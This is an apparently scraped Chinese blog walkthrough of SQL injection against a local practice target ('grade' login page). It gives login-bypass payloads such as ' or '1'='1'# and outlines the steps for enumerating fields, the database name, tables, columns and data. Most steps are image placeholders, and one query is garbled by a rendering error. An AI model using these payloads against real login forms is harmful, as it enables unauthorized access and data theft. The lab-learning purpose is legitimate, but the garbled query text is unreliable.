万能密码:

实践靶场:http://127.0.0.1/grade/login.html

等号的优先级大于and,and大于or
万能密码: ‘or’1’='1

select * from " .KaTeX parse error: Double superscript at position 45: … and pass=' '̲or'1'='1 ' …t_name.’’;

万能账号: ‘or’1’=‘1’#

select * from " .$t_name." where id = ’ ‘or’1’=‘1# ’ and pass=’ ’ ;

爆字段数:

万能密码之攻克grade

爆输出位置:(爆字段位置)

万能密码之攻克grade

爆数据库名:

在这里插入图片描述

由于限制的输入的长度 我们接下来使用burpsuite进行拦截:

爆表名:

万能密码之攻克grade
万能密码之攻克grade
爆列名:

万能密码之攻克grade
万能密码之攻克grade

爆数据

万能密码之攻克grade

万能密码之攻克grade

相关文章:

  • 2022-03-08
  • 2021-08-09
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-01-08
猜你喜欢
  • 2022-12-23
  • 2022-01-08
  • 2022-01-08
  • 2022-12-23
  • 2022-01-08
  • 2021-06-27
相关资源
相似解决方案